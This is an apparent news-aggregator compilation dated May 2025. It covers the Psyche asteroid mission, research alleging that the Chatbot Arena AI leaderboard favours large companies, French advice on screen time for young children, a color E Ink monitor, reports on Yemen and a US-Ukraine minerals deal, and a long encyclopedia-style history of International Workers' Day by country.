The plasma thrusters are reshaping the Psyche spacecraft's path toward its destination, a metal-rich asteroid also named Psyche. The spacecraft's four electric engines, known as Hall effect thrusters, were supplied by a Russian company named Fakel. Most of the other components in Psyche's propulsion system—controllers, xenon fuel tanks, propellant lines, and valves—come from other companies or the spacecraft's primary manufacturer, Maxar Space Systems, in California.
The Psyche mission is heading first for Mars, where the spacecraft will use the planet's gravity next year to slingshot itself into the asteroid belt, setting up for arrival and orbit insertion around the asteroid Psyche in August 2029.
Psyche
launched in October 2023
aboard a SpaceX Falcon Heavy rocket on the opening leg of a six-year sojourn through the Solar System. The mission's total cost adds up to more than $1.4 billion, including development of the spacecraft and its instruments, the launch, operations, and an
experimental laser communications package
hitching a ride to deep space with Psyche.
Psyche, the asteroid, is the size of Massachusetts and circles the Sun in between the orbits of Mars and Jupiter. No spacecraft has visited Psyche before. Of the approximately 1 million asteroids discovered so far, scientists say only nine have a metal-rich signature like Psyche. The team of scientists who put together the Psyche mission have little idea of what to expect when the spacecraft gets there in 2029.
Metallic asteroids like Psyche are a mystery. Most of Psyche's properties are unknown other than estimates of its density and composition. Predictions about the look of Psyche's craters, cliffs, and color have inspired artists to create a cacophony of illustrations, often showing sharp spikes and grooves alien to rocky worlds.
In a little more than five years, assuming NASA gets past Psyche's propulsion problem, scientists will supplant speculation with solid data.
Researchers Say the Most Popular Tool for Grading AIs Unfairly Favors Meta, Google, OpenAI
404 Media
www.404media.co
2025-05-01 14:00:15
Chatbot Arena is the most popular AI benchmarking tool, but new research says its scores are misleading and benefit a handful of the biggest companies....
The most popular method for measuring what are the best chatbots in the world is flawed and frequently manipulated by powerful companies like OpenAI and Google in order to make their products seem better than they actually are, according to a new paper from researchers at the AI company Cohere, as well as Stanford, MIT, and other universities.
The researchers came to this conclusion after reviewing data that’s made public by Chatbot Arena (also known as LMArena and LMSYS), which facilitates benchmarking and maintains the leaderboard listing the best large language models, as well as scraping Chatbot Arena and their own testing. Chatbot Arena, meanwhile, has responded to the researchers’ findings by saying that while it accepts some criticisms and plans to address them, some of the numbers the researchers presented are wrong and mischaracterize how Chatbot Arena actually ranks LLMs. The research was published just weeks after Meta was accused of gaming AI benchmarks with one of its recent models.
If you’re wondering why this beef between the researchers, Chatbot Arena, and others in the AI industry matters at all, consider the fact that the biggest tech companies in the world as well as a great number of lesser known startups are currently in a fierce competition to develop the most advanced AI tools, operating under the belief that these AI tools will define the future of humanity and enrich the most successful companies in this industry in a way that will make previous technology booms seem minor by comparison.
I should note here that Cohere is an AI company that produces its own models and that they don’t appear to rank very highly in the Chatbot Arena leaderboard. The researchers also make the point that proprietary closed models from competing companies appear to have an unfair advantage over open-source models, and Cohere proudly boasts that its model Aya is “one of the largest open science efforts in ML to date.” In other words, the research is coming from a company that Chatbot Arena doesn’t benefit.
Judging which large language model is the best is tricky because different people use different AI models for different purposes and what is the “best” result is often subjective, but the desire to compete and compare these models has made the AI industry default to the practice of benchmarking AI models. Specifically, Chatbot Arena, which gives a numerical “Arena Score” to models companies submit and maintains a leaderboard listing the highest scoring models. At the moment, for example, Google’s Gemini 2.5 Pro is in the number one spot, followed by OpenAI’s o3, ChatGPT 4o, and X’s Grok 3.
The vast majority of people who use these tools probably have no idea the Chatbot Arena leaderboard exists, but it is a big deal to AI enthusiasts, CEOs, investors, researchers, and anyone who actively works or is invested in the AI industry. The significance of the leaderboard also remains despite the fact that it has been criticized extensively over time for the reasons I list above. The stakes of the AI race and who will win it are objectively very high in terms of the money that’s being poured into this space and the amount of time and energy people are spending on winning it, and Chatbot Arena, while flawed, is one of the few places that’s keeping score.
“A meaningful benchmark demonstrates the relative merits of new research ideas over existing ones, and thereby heavily influences research directions, funding decisions, and, ultimately, the shape of progress in our field,” the researchers write in their paper, titled “The Leaderboard Illusion.” “The recent meteoric rise of generative AI models—in terms of public attention, commercial adoption, and the scale of compute and funding involved—has substantially increased the stakes and pressure placed on leaderboards.”
The way that Chatbot Arena works is that anyone can go to its site and type in a prompt or question. That prompt is then given to two anonymous models. The user can’t see what the models are, but in theory one model could be ChatGPT while the other is Anthropic’s Claude. The user is then presented with the output from each of these models and votes for the one they think did a better job. Multiply this process by millions of votes and that’s how Chatbot Arena determines who is placed where on the leaderboards. Deepseek, the Chinese AI model that rocked the industry when it was released in January, is currently ranked #7 on the leaderboard, and its high score was part of the reason people were so impressed.
According to the researchers’ paper, the biggest problem with this method is that Chatbot Arena is allowing the biggest companies in this space, namely Google, Meta, Amazon, and OpenAI, to run “undisclosed private testing” and cherrypick their best model. The researchers said their systemic review of Chatbot Arena involved combining data sources encompassing 2 million “battles,” auditing 42 providers and 243 models between January 2024 and April 2025.
“This comprehensive analysis reveals that over an extended period, a handful of preferred providers have been granted disproportionate access to data and testing,” the researchers wrote. “In particular, we identify an undisclosed Chatbot Arena policy that allows a small group of preferred model providers to test many model variants in private before releasing only the best-performing checkpoint.”
Basically, the researchers claim that companies test their LLMs on Chatbot Arena to find which models score best, without those tests counting towards their public score. Then they pick the model that scores best for official testing.
Chatbot Arena says the researchers’ framing here is misleading.
“We designed our policy to prevent model providers from just reporting the highest score they received during testing. We only publish the score for the model they release publicly,” it said on X.
“In a single month, we observe as many as 27 models from Meta being tested privately on Chatbot Arena in the lead up to Llama 4 release,” the researchers said. “Notably, we find that Chatbot Arena does not require all submitted models to be made public, and there is no guarantee that the version appearing on the public leaderboard matches the publicly available API.”
In early April, when Meta’s model Maverick shot up to the second spot of the leaderboard, users were confused because they didn’t find it that good and better than other models that ranked below it. As Techcrunch noted at the time, that might be because Meta used a slightly different version of the model “optimized for conversationality” on Chatbot Arena than what users had access to.
“We helped Meta with pre-release testing for Llama 4, like we have helped many other model providers in the past,” Chatbot Arena said in response to the research paper. “We support open-source development. Our own platform and analysis tools are open source, and we have released millions of open conversations as well. This benefits the whole community.”
The researchers also claim that makers of proprietary models, like OpenAI and Google, collect far more data from their testing on Chatbot Arena than fully open-source models do, which allows them to better fine-tune their models to what Chatbot Arena users want.
That last part on its own might be the biggest problem with Chatbot Arena’s leaderboard in the long term, since it incentivizes the people who create AI models to design them in a way that scores well on Chatbot Arena as opposed to what might make them materially better and safer for users in a real world environment.
As the researchers write: “the over-reliance on a single leaderboard creates a risk that providers may overfit to the aspects of leaderboard performance, without genuinely advancing the technology in meaningful ways. As Goodhart’s Law states, when a measure becomes a target, it ceases to be a good measure.”
Despite their criticism, the researchers acknowledge the contribution of Chatbot Arena to AI research and that it serves a need, and their paper ends with a list of recommendations on how to make it better, including preventing companies from retracting scores after submission and being more transparent about which models engage in private testing and how much.
“One might disagree with human preferences—they’re subjective—but that’s exactly why they matter,” Chatbot Arena said on X in response to the paper. “Understanding subjective preference is essential to evaluating real-world performance, as these models are used by people. That’s why we’re working on statistical methods—like style and sentiment control—to decompose human preference into its constituent parts. We are also strengthening our user base to include more diversity. And if pre-release testing and data helps models optimize for millions of people’s preferences, that’s a positive thing!”
“If a model provider chooses to submit more tests than another model provider, this does not mean the second model provider is treated unfairly,” it added. “Every model provider makes different choices about how to use and value human preferences.”
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
Children under six should avoid screen time, French medical experts say
Guardian
www.theguardian.com
2025-05-01 13:54:38
TV, tablets and smartphones ‘hinder and alter brain development’, open letter says Children under the age of six should not be exposed to screens, including television, to avoid permanent damage to their brain development, French medical experts have said. TV, tablets, computers, video games and sma...
Children under the age of six should not be exposed to screens, including television, to avoid permanent damage to their brain development, French medical experts have said.
TV, tablets, computers, video games and smartphones have “already had a heavy impact on a young generation sacrificed on the altar of ignorance”, according to an open letter to the government from five leading health bodies – the societies of paediatrics, public health, ophthalmology, child and adolescent psychiatry, and health and environment.
Calling for an urgent rethink by public policies to protect future generations, they said: “Screens in whatever form do not meet children’s needs. Worse, they hinder and alter brain development,” causing “a lasting alteration to their health and their intellectual capacities”.
Current recommendations in France are that children should not be exposed to screens before the age of three and have only “occasional use” between the ages of three and six in the presence of an adult.
The societies suggest the ban on screens should apply at home and in schools.
They wrote: “Neither the screen technology nor its content, including so-called ‘educational’ content, are adapted to a small developing brain. Children are not miniature adults: their needs are different.”
They add that every day health professionals and infant school teachers “observe the damage caused by regular exposure to screens before they [children] enter elementary school: delayed language, attention deficit, memory problems and motor agitation”.
The experts suggest regular exposure to screens – however brief – has also had a negative effect on children’s social and emotional development. They suggest the problem affects all social groups, but particularly disadvantaged households, leading to greater “social inequalities”. Alternatives include “reading aloud, free play, board games or outdoor games, physical, creative and artistic activities”.
The letter says: “It would occur to no one to let a child of under six cross the road on their own. Why then expose them to a screen when this compromises their health and their intellectual future?”
Last year, a report commissioned by France’s president, Emmanuel Macron, found that French three- to six-year-olds spent an average of 1 hour 47 minutes a day in front of a screen in 2014-15, the latest available research. Since then, however, only one of the commission’s recommendations, concerning the exposure of under-threes to screens, has been implemented.
Former prime minister Gabriel Attal has gone further, proposing to ban children under 15 from social media, with an online “curfew” for 15- to 18-year-olds halting their access to social media at 10pm.
If you're in the market for a $1,900 color E Ink monitor, one of them exists now
Color E Ink in its current state requires a whole lot of compromises, as we've found when reviewing devices like reMarkable's Paper Pro or Amazon's Kindle Colorsoft, including washed-out color, low refresh rates, and a grainy look that you don't get with regular black-and-white E Ink. But that isn't stopping device manufacturers from exploring the technology, and today, Onyx International has announced that it has a $1,900 color E Ink monitor that you can connect to your PC or Mac.
The Boox Mira Pro is a 25.3-inch monitor with a 3200×1800 resolution and a 16:9 aspect ratio, and it builds on the company's previous black-and-white Mira Pro monitors. The Verge reports that the screen uses E Ink Kaleido 3 technology, which can display up to 4,096 colors. Both image quality and refresh rate will vary based on which of the monitor's four presets you use (the site isn't specific about the exact refresh rate but does note that "E Ink monitors' refresh speed is not as high as conventional monitors', and increased speed will result in more ghosting").
The monitor's ports include one full-size HDMI port, a mini HDMI port, a USB-C port, and a DisplayPort. Its default stand is more than a little reminiscent of Apple's Studio Display, but it also supports VESA mounting.
Onyx International's lineup of Boox devices usually focuses on Android-powered E Ink tablets, which the company has been building for over a decade. These are notable mostly because they combine the benefits of E Ink—text that's easy on the eyes and long battery life—and access to multiple bookstores and other content sources via Google Play, rather than tying you to one manufacturer's ecosystem as Amazon's Kindles or other dedicated e-readers do.
Yemeni People in State of "Terror" After 1,000+ U.S. Airstrikes Kill Hundreds: Helen Lackner
Democracy Now!
www.democracynow.org
2025-05-01 13:53:23
A U.S. military strike on a migrant detention center in the north of Yemen has killed at least 68 people, largely migrants from African nations, bringing the death toll from U.S. attacks on the country to over 250 since mid-March. Middle East researcher Helen Lackner says the number of deaths is lik...
A U.S. military strike on a migrant detention center in the north of Yemen has killed at least 68 people, largely migrants from African nations, bringing the death toll from U.S. attacks on the country to over 250 since mid-March. Middle East researcher Helen Lackner says the number of deaths is likely twice the officially recorded number, as the United States has now conducted more than 1,000 strikes on Yemen “on an absolutely nightly basis.” Lackner says the humanitarian crisis in Yemen has also been exacerbated by the end of U.S. aid and the U.S.'s designation of the country's Houthi movement as a “foreign terrorist organization.” “People who are living in the country are suffering on a daily basis from basically terror and fright or from being attacked and possibly being bombed and killed [at] any time.”
Is Trump's "Minerals Deal" a Fossil Fuel Shakedown? Antonia Juhasz on New U.S.-Ukraine Agreement
Democracy Now!
www.democracynow.org
2025-05-01 13:43:46
The Trump administration has signed a deal with Ukraine to give the United States a long-term stake in the country’s oil, gas, coal and mineral resources as part of a joint investment fund with Kyiv. President Trump has sought to frame the agreement as repayment of U.S. military aid to Ukraine...
The Trump administration has signed a deal with Ukraine to give the United States a long-term stake in the country’s oil, gas, coal and mineral resources as part of a joint investment fund with Kyiv. President Trump has sought to frame the agreement as repayment of U.S. military aid to Ukraine since the start of Russia’s invasion in February 2022. We speak with investigative journalist Antonia Juhasz, who characterizes the deal as an “unprecedented” resource “grab” that allows Trump to reopen U.S. access to Russian oil and gas, which can be channeled through Ukrainian energy infrastructure.
International Workers' Day
2013 International Workers’ Day demonstration in Austria
Labour celebration days existed in some European countries from the end of the 18th century[12] – sometimes on January 20 (France, 1793),[13] sometimes on June 5 (France, 1867).[14]
On 21 April 1856, Australian stonemasons in Victoria undertook a mass stoppage as part of the eight-hour workday movement.[15] It became a yearly commemoration, inspiring American workers to have their first stoppage.[16]
1 May was chosen to be International Workers' Day to commemorate the 1886
Haymarket affair
in
Chicago
.
[
17
]
In that year beginning on 1 May, there was a general strike for the eight-hour workday. On 4 May, the police acted to disperse a public assembly in support of the strike when an unidentified person threw a bomb. The police responded by firing on the workers. The event led to the deaths of seven police officers and at least four civilians; sixty police officers were injured, as were one hundred and fifteen civilians.
[
18
]
[
19
]
Hundreds of labour leaders and sympathizers were later rounded-up and four were executed by hanging, after a trial that was seen as a
miscarriage of justice
.
[
20
]
[
nb 1
]
The following day on 5 May, in
Milwaukee, Wisconsin
, the
state militia
fired on a crowd of strikers killing seven, including a schoolboy and a man feeding chickens in his yard.
[
22
]
International Workers' Day has also been a focal point for demonstrations by various socialist, communist and anarchist groups since the Second International. It is one of the most important holidays in communist countries such as China, Vietnam, Cuba, Laos, North Korea, and the former Soviet Union countries. Celebrations in these countries typically feature elaborate workforce parades, including displays of military hardware and soldiers.
International Workers' Day rally in Moscow, 1 May 1960
Eastern Bloc countries such as the Soviet Union and most countries of central and eastern Europe that were under the rule of Marxist–Leninist governments held official Workers' Day celebrations in every town and city, during which party leaders greeted the crowds. Workers carried banners with political slogans and many companies decorated their company cars. The biggest celebration of 1 May usually occurred in the capital of a particular socialist country and usually included a military display and the presence of the president and the secretary general of the party. During the Cold War, International Workers' Day became the occasion for large military parades in Red Square by the Soviet Union, attended by the top leaders of the Kremlin, especially the Politburo, atop Lenin's Mausoleum. It became an enduring symbol of that period. In Poland, since 1982, party leaders led the official parades. In Hungary, International Workers' Day was officially celebrated under communist rule, and it remains a public holiday. Traditionally, the day was marked by dancing around designated "May trees".[30]
Some factories in socialist countries were named in honour of International Workers' Day, such as 1 Maja Coal Mine in Wodzisław Śląski, Poland. In East Germany, the holiday was officially known as Internationaler Kampf- und Feiertag der Werktätigen für Frieden und Sozialismus ("International Day of the Struggle and Celebration of the Workers for Peace and Socialism"); similar names were used in other Eastern Bloc countries.
(Map: countries and dependencies coloured by observance of International Workers' Day or Labour Day - where Labour Day falls or may fall on 1 May; where another public holiday falls on 1 May; and where there is no public holiday on 1 May but Labour Day is observed on a different date.)
1 May is a holiday in Ghana. It is a day to celebrate all workers across the country, and it is celebrated with a parade by trade unions and labour associations.[35] The parades are normally addressed by the Secretary General of the trade union congress and by regional secretaries in the regions.[35] Workers from different workplaces identify their companies through banners and T-shirts.[35]

In Kenya, 1 May is a public holiday and celebrated as Labour Day. It is a big day addressed by the leaders of the workers' umbrella union body, the Central Organisation of Trade Unions (COTU). The Cabinet Secretary in charge of the Ministry of Labour and Social Protection (and occasionally the President) addresses the workers. Each year, the government approves (and increases) the minimum wage on Labour Day.[36]
In Mauritius, 1 May is a public holiday celebrated as Labour Day. It was celebrated for the first time in Mauritius on 1 May 1938, and for the first time as an official public holiday on 1 May 1950, thanks largely to the efforts of Guy Rozemont, Dr. Maurice Curé, Pandit Sahadeo and Emmanuel Anquetil. It is a day of special significance for Mauritian workers, who for many years had struggled for their social, political and economic rights.[39]
1 May is recognized as a public holiday in Namibia and celebrated as Workers' Day.[42]

Since 1981, 1 May has been a public holiday in Nigeria. On the day, people gather while, traditionally, the president of the Nigeria Labour Congress and other politicians address workers.[43]
In South Africa, Workers' Day has been celebrated as a national public holiday on 1 May each year since 1995.[45] Workers' Day started to receive more attention from African workers in 1928, when thousands of workers held a mass march. In 1950, the South African Communist Party called for a strike on 1 May in response to the Suppression of Communism Act, which had declared the party illegal. Police violence caused the deaths of 18 people across Soweto. The holiday has its origins in the historical struggles of workers and their trade unions internationally for solidarity between working people: struggles to win fair employment standards and, more importantly, to establish a culture of human and worker rights and to ensure that these are enshrined in international law and national law.[46]

In 1986, the hundredth anniversary of the Haymarket affair, the Congress of South African Trade Unions (COSATU) called for the government to establish an official holiday on 1 May, and called for workers to stay home from work that day.[47] COSATU was joined by a number of prominent anti-apartheid organizations, including the National Education Crisis Committee and the United Democratic Front.[48] The call was also supported by a number of organizations regarded as conservative, such as the African Teachers' Association of South Africa, the National African Federated Chamber of Commerce, and the Steel and Engineering Industries Federation of South Africa, an organization that represented employers in the metal industries.[48] More than 1,500,000 workers observed the call and stayed home, as did thousands of students, taxi drivers, vendors, shopkeepers, domestic workers, and self-employed people.[48] In the following years, 1 May became a popular, if not official, holiday.[47]

As a result of the killings on 1 May 1950 and the success of COSATU's call in 1986, 1 May became associated with resistance to the apartheid government. After the first universal election in 1994, 1 May was adopted as a public holiday, celebrated for the first time in 1995.[47] On its website, the city of Durban states that the holiday "celebrate[s] the role played by trade unions and other labour movements in the fight against South Africa's apartheid regime".[49]
In Tanzania, 1 May is a public holiday, celebrated as Workers' Day.[50]
In Argentina, Workers' Day is an official holiday on 1 May, and is frequently associated with labour unions. Celebrations related to labour are held, including demonstrations in major cities. The first Workers' Day celebration was in 1890, when Argentinian unions organized several celebrations in Buenos Aires and other cities, at the same time that the international labour movement celebrated it for the first time.[55] In 1930, it was established as an official holiday by the Radical Civic Union president Hipólito Yrigoyen. The day became particularly significant during the worker-oriented government of Juan Domingo Perón (1946–55),[56] who permitted and endorsed national recognition of the holiday during his tenure in office.
In Barbados, International Workers' Day is a public holiday celebrated on 1 May.[57]

In Bolivia, 1 May is known as Labour Day and is a holiday.[58] By custom, it is usually the day on which wage increases (e.g., in the national minimum wage) and other labour improvements are announced by the Government. In recent years it has also been the day chosen by the Bolivian government to announce the (re)nationalization of strategic sectors of the economy (e.g. hydrocarbons in 2006, telecommunications in 2008, electricity in 2010, etc.).
In Brazil, "Workers' Day" is an official holiday celebrated on 1 May, and unions commemorate it with day-long public events.[59]
In Canada, Labour Day is celebrated in September. In 1894, the government of Prime Minister John Sparrow David Thompson declared the first Monday in September as Canada's official Labour Day. Labor Day in the United States is on the same day.

International Workers' Day is nevertheless marked by unions and leftists on 1 May. It is an important day of trade union and community group protest in the province of Quebec (though not a provincial statutory holiday). Celebration of the International Labour Day (or "International Workers' Day"; French: Journée internationale des travailleurs) in Montreal goes back to 1906, organized by the Mutual Aid circle. The tradition had a renaissance at the time of a mass strike in 1972. On Labour Day 1973, the first contemporary demonstration was organized by the major trade union confederations; over 30,000 trade unionists took part. Further, it is the customary date on which the minimum wage rises.[60]
In Chile, President Carlos Ibáñez del Campo decreed 1 May a national holiday in 1931, in honour of the dignity of workers. [61] All stores and public services must close for the entire day, and the major trade unions of Chile, represented in the national organization Workers' United Center of Chile (Central Unitaria de Trabajadores), organize rallies during the morning hours, with festivities and cookouts in the later part of the day, in all the major cities of Chile. During these rallies, representatives of the major left-wing political parties speak to the assemblies on the issues of the day concerning workers' rights.
1 May has long been recognized as Labour Day and almost all workers respect it as a national holiday.[62] As in many other countries, it is common to see rallies by the trade unions in the main regional capitals of the country.[63]
First celebrated in 1913,[64] Labour Day is a public holiday in Costa Rica, and at the same time an important day for government activities. On this day, the President of Costa Rica gives a speech to the citizens and the legislature of Costa Rica about the duties undertaken over the previous year. The president of the legislature is also chosen by its members.[65]
This day is known as Labour Day in Cuba. People march in the streets throughout the morning, showing their support for the Cuban Communist government and the Cuban Revolution.[66]
1 May is a national holiday known as Labour Day, celebrated with workers' parades and demonstrations.

In Ecuador, 1 May is an official public holiday known as Labour Day. People do not go to work and spend time with their relatives or gather for demonstrations.[68]
1 May is an official public holiday known as Labour Day.[69]

1 May is an official public holiday known as Labour Day.[70]

1 May is an official public holiday known as Agriculture and Labour Day.[71]

1 May is an official holiday, known as "Labour Day", within Honduras.[72]

In Mexico, 1 May is a federal holiday. It also commemorates the Cananea Strike of 1906 in the Mexican state of Sonora.

1 May is an official public holiday, known as "Labour Day", within Panama.[73]

1 May is an official public holiday, known as "Labour Day", within Paraguay.[74]

1 May is an official public holiday, known as "Labour Day", within Peru.[75]
Socialists in Union Square, New York City, on 1 May 1912
In the United States, a "Labor Day" celebrated on the first Monday in September was given increasing state recognition from 1887, and became an official federal holiday in 1894.[29] Efforts to switch Labor Day from September to 1 May have not been successful.

In 1947, 1 May was established as Loyalty Day by the U.S. Veterans of Foreign Wars as a way to counter communist influence and recruitment at International Workers' Day rallies.[77] Loyalty Day was celebrated across the country with patriotic parades and ceremonies; however, the growing conflict over U.S. involvement in Vietnam detracted from the popularity of these celebrations.[77] In 1958, the American Bar Association campaigned to have 1 May designated as Law Day, which was acknowledged in 1961 by a joint resolution of Congress.[78] Law Day exercises, such as mock trials and courthouse tours, are often sponsored by the American Bar Association.

In 2006, 1 May was chosen by mostly Latino immigrant groups in the United States as the day for the Great American Boycott, a general strike of undocumented immigrant workers and supporters to protest H.R. 4437, immigration reform legislation that they felt was draconian. From 10 April to 1 May of that year, immigrant families in the U.S. called for immigrant rights, workers' rights and amnesty for undocumented workers. They were joined by socialist and other leftist organizations on 1 May.[81][82]
On 1 May 2007, a mostly peaceful demonstration in Los Angeles in support of undocumented immigrant workers ended with a widely televised dispersal by police officers. In March 2008, the International Longshore and Warehouse Union announced that dockworkers would move no cargo at any West Coast ports on 1 May 2008, as a protest against the continuation of the Iraq War and the diversion of resources from domestic needs.[83]

On 1 May 2012, members of Occupy Wall Street and labor unions held protests together in a number of cities in the United States and Canada to commemorate International Workers' Day and to protest the state of the economy and economic inequality.[84][85]

On 1 May 2017, immigrants' rights advocates, labor unions and leftists held protests against the immigration and economic policies of President Donald Trump in cities throughout the US, with Chicago and Los Angeles having some of the largest marches.[86][87]

On 1 May 2021, black bloc protesters clashed with police in Oakland and Portland. Numerous other activities occurred across the country.[90]
In Uruguay, 1 May – Workers' Day – is an official holiday. Even though it is associated with labour unions, almost all workers tend to respect it. Since the late 1990s, the main event has taken place at the First of May Square in Montevideo.
International Workers' Day celebration in Beijing on 1 May 1952
1 May is a statutory holiday in the People's Republic of China. It was a three-day holiday until 2008, but has been a one-day holiday since then.[92][93] During the Golden Week, the surrounding weekends are rescheduled: workers had seven continuous days off before 2009, and have had four to five continuous days off since 2018.[94]

In Macau, it is a public holiday, officially known as Dia do Trabalhador (Portuguese for "Workers' Day").[97]
1 May is known as Labor Day in Taiwan and is an official holiday, though not everybody gets a day off; students and teachers do not have the day off.[98]
International Workers' Day is not officially designated by the Japanese government as a national holiday, but because it lies between other national holidays, it is a day off work for the vast majority of Japanese workers: many employers give it as a day off, and other workers take it as paid leave. 1 May occurs during "Golden Week", together with 29 April ("Shōwa Day"), 3 May ("Constitution Memorial Day"), 4 May ("Greenery Day") and 5 May ("Children's Day").[99] Workers generally take the day off not so much to join street rallies or labour union gatherings as to go on holiday for several consecutive days (in Japanese corporate culture, taking weekdays off for personal pleasure is widely frowned upon).

Some major labour unions organize rallies and demonstrations in Tokyo,[100] Osaka, and Nagoya.[101] Japan has a long history of labour activism and has had communist and socialist parties in the Diet since 1945. In 2008, the National Confederation of Trade Unions (Zenrōren) held a rally in Yoyogi Park attended by 44,000 participants, while the National Trade Unions Council (Zenrōkyō) held its International Workers' Day rally at Hibiya Park. Rengō, the largest Japanese trade union federation, held its International Workers' Day rally on the following Saturday (3 May), allegedly to distance itself from the more radical labour unions.
Labour Day (Albanian: Dita e punëtorëve) is an official holiday celebrated on 1 May, and thus schools and most businesses are closed.[104]

Labour Day (Armenian: Աշխատանքի օր, ashxatanki or) is an official holiday celebrated on 1 May.[105]
1st of May demonstration of the SPÖ at Rathausplatz in Vienna

Labour Day (Tag der Arbeit), officially called Staatsfeiertag (state holiday), is a public holiday in Austria. Left parties, especially the social democrats, organize celebrations with marches and speeches in all major cities. In smaller towns and villages those marches are held the night before.
In Belgium, Labour Day (Dutch: Dag van de Arbeid, Feest van de Arbeid; French: Journée des travailleurs, Fête du travail) is observed on 1 May and has been an official holiday since 1948.[106] Various socialist and communist organizations hold parades and other events in different cities.[107]
In Bosnia and Herzegovina, 1 and 2 May (Bosnian and Serbian: Prvi Maj / Први Mај; Croatian: Prvi Svibanj) are an official holiday and a day off for public bodies and schools at the national level. Most people celebrate this holiday by visiting natural parks and resorts, and in some places public events are organized. In the capital city, Sarajevo, which has many natural parks and springs, 12 and 13 June are also celebrated as Labour Day.
Labour Day is one of the public holidays in Bulgaria, where it is known as Labour Day and International Workers' Solidarity Day (Bulgarian: Ден на труда и на международната работническа солидарност) and celebrated annually on 1 May.[108] The first attempt to celebrate it was in 1890, by the Bulgarian Typographical Association. In 1939, Labour Day was declared an official holiday. From 1945, the communist authorities in the People's Republic of Bulgaria celebrated the holiday every year. Since the end of socialism in Bulgaria in 1989, Labour Day has continued to be an official and public holiday, but state authorities are no longer committed to the organization of mass events.
In Croatia, 1 May is a national holiday, Labour Day. Many public events are organized and held all over the country, at which bean soup is given out as a symbol of a real workers' dish, and red carnations are handed out to symbolise the origin of the day. In Zagreb, the capital, a major gathering takes place in Maksimir Park, in the east part of the city. In Split, a city on the coast, people go to Marjan, a park-forest at the western end of the Split peninsula.[109]
In Cyprus, 1 May (Greek: Εργατική Πρωτομαγιά) is an official public holiday (Labour Day). In general, all stores in both the public and private sector remain closed. The labour unions and syndicates celebrate with various festivals and events across the country.

In the Czech Republic, 1 May is an official and national holiday known as Labour Day (Czech: Svátek práce).[110]
In Denmark, 1 May is not an official holiday, but a variety of individuals, mostly in the public sector, construction industry, and production industry, get a half or a whole day off. It was first celebrated in Copenhagen in 1890. The location of the first celebration, Fælledparken, still plays an important part today, with speeches by politicians and trade unionists to mark the occasion. Many other events are also held around the country to commemorate the day.[111]

In Estonia, 1 May is a public holiday and celebrated as part of May Day (Kevadpüha). It also coincides with Walpurgis Day (volbripäev).

In Finland, 1 May is an official and national holiday. It is mainly celebrated as a feast of students and of spring, called vappu or Walpurgis Night.[112] Finland also celebrates Workers' Day (officially: suomalaisen työn päivä, "day of Finnish labour") on the same day.
In France, 1 May is a public holiday called Workers' Day (French: Fête du Travail). It is, in fact, the only day of the year on which employees are legally obliged to be given leave, save for professions that cannot be interrupted due to their nature (such as workers in hospitals and public transport).[113] Demonstrations and marches are a Labour Day tradition in France, where trade unions organize parades in major cities to defend workers' rights.

It is also customary to offer a lily of the valley to friends or family. This custom dates back to 1561, when King Charles IX, aged 10 and waiting for his accession to the throne, gave a lily of the valley to all the ladies present. Today, the fiscal administration exempts individuals and workers' organizations from any tax or administrative duties related to the sale of lilies of the valley, provided they are gathered from the wild and not bought to be resold.
In April 1933, the recently installed Nazi government declared 1 May the "Day of National Work", an official state holiday, and announced that all celebrations were to be organized by the government. Any separate celebrations by Communists, Social Democrats or labour unions were banned.

After World War II, 1 May remained a state holiday in both East and West Germany. In communist East Germany, workers were de facto required to participate in large state-organized parades on International Workers' Day.
Today in Germany it is simply called "Labour Day" (Tag der Arbeit), and there are numerous demonstrations and celebrations by independent workers' organizations. Berlin witnesses yearly demonstrations on Labour Day, the largest organised by labour unions, political parties, the far left and the leftist Autonomen.

Since 1987, Labour Day has also become known for riots in some districts of Berlin. After police actions against radical leftists in that year's annual demonstrations, the Autonomen scattered and sought cover at the ongoing annual street fair in Kreuzberg. Three years before the reunification of Germany, these violent protests took place only in the former West Berlin. The protesters began tipping over police cars, violently resisting arrest, and building barricades after the police withdrew in the face of the unforeseen resistance. Cars were set on fire, and shops were plundered and burned to the ground. The police eventually ended the riots the following night. These violent forms of protest by the radical left later increasingly involved participants without political motivation.[114]

Annual street fairs have proven an effective way to prevent riots, and Labour Day in 2005 and 2006 was among the most peaceful Berlin had known in nearly 25 years. In recent years, neo-Nazis and other groups on the far right, such as the National Democratic Party of Germany, have used the day to schedule public demonstrations, often leading to clashes with left-wing protesters, which turned especially violent in Leipzig in 1998 and 2005.

Labour Day violence flared up again in 2010. After an approved far-right demonstration was blocked by leftists, a parade by an estimated 10,000 leftists and anarchists turned violent and prompted an active response by the Berlin Police.[115]
In Greece, 1 May is an optional public holiday, but it is treated by workers as a strike day. The Ministry of Labour retains the right to classify it as an official public holiday on an annual basis, and customarily does so.[116] The day is called Ergatikí Protomagiá (Εργατική Πρωτομαγιά, lit. "Workers' 1 May"), and celebrations are marked by demonstrations in which left-wing political parties, anti-authority groups, and workers' unions participate.

On Workers' Day in 2010 there were major protests all over Greece, most notably in Athens and Thessaloniki, by many left-wing, anarchist and communist supporters, with some violent clashes with riot police who were sent out to contain the protesters. The protesters opposed the economic reforms and demanded an end to job losses and wage cuts in the face of the government's proposals for massive public spending cuts. These reforms were to fall in line with the IMF-EU-ECB loan proposals, which demanded that Greece liberalize its economy and cut its public spending and private sector wages, which many believed would decrease living standards.[117]
Hungary celebrates 1 May as a national holiday, Workers' Day (Hungarian: A munka ünnepe), with open-air festivities and fairs all over the country. Many towns raise maypoles, and festivals with various themes are organized around the holiday. Left-wing parties and trade unions hold public rallies commemorating Labour Day.[118]

In Iceland, Labour Day (Icelandic: Baráttudagur verkalýðsins) is a public holiday. The first demonstration for workers' rights in Iceland occurred in 1923. A parade composed of trade unions and other groups marches through towns and cities across the country, and speeches are delivered.[119] However, some private businesses are open, mainly in the capital.[120]
International Workers' Day parade in Belfast, 2011

Traditional 1 May Concert in St. John Lateran square, Rome
The first International Workers' Day celebration in Italy took place in 1890. It started initially as an attempt to celebrate workers' achievements in their struggle for their rights and for better social and economic conditions.

It was abolished under the Fascist regime and immediately restored after the Second World War. (During the fascist period, a "Holiday of the Italian Labour" (Festa del lavoro italiano) was celebrated on 21 April, the date of Natale di Roma, when Rome was allegedly founded.) In 1947, following an unexpected electoral victory of the Popular Democratic Front in Sicily, local secessionists and pro-USA mafia hitmen killed 14 people and injured 27, firing machine guns at an International Workers' Day celebration, in the Portella della Ginestra massacre.

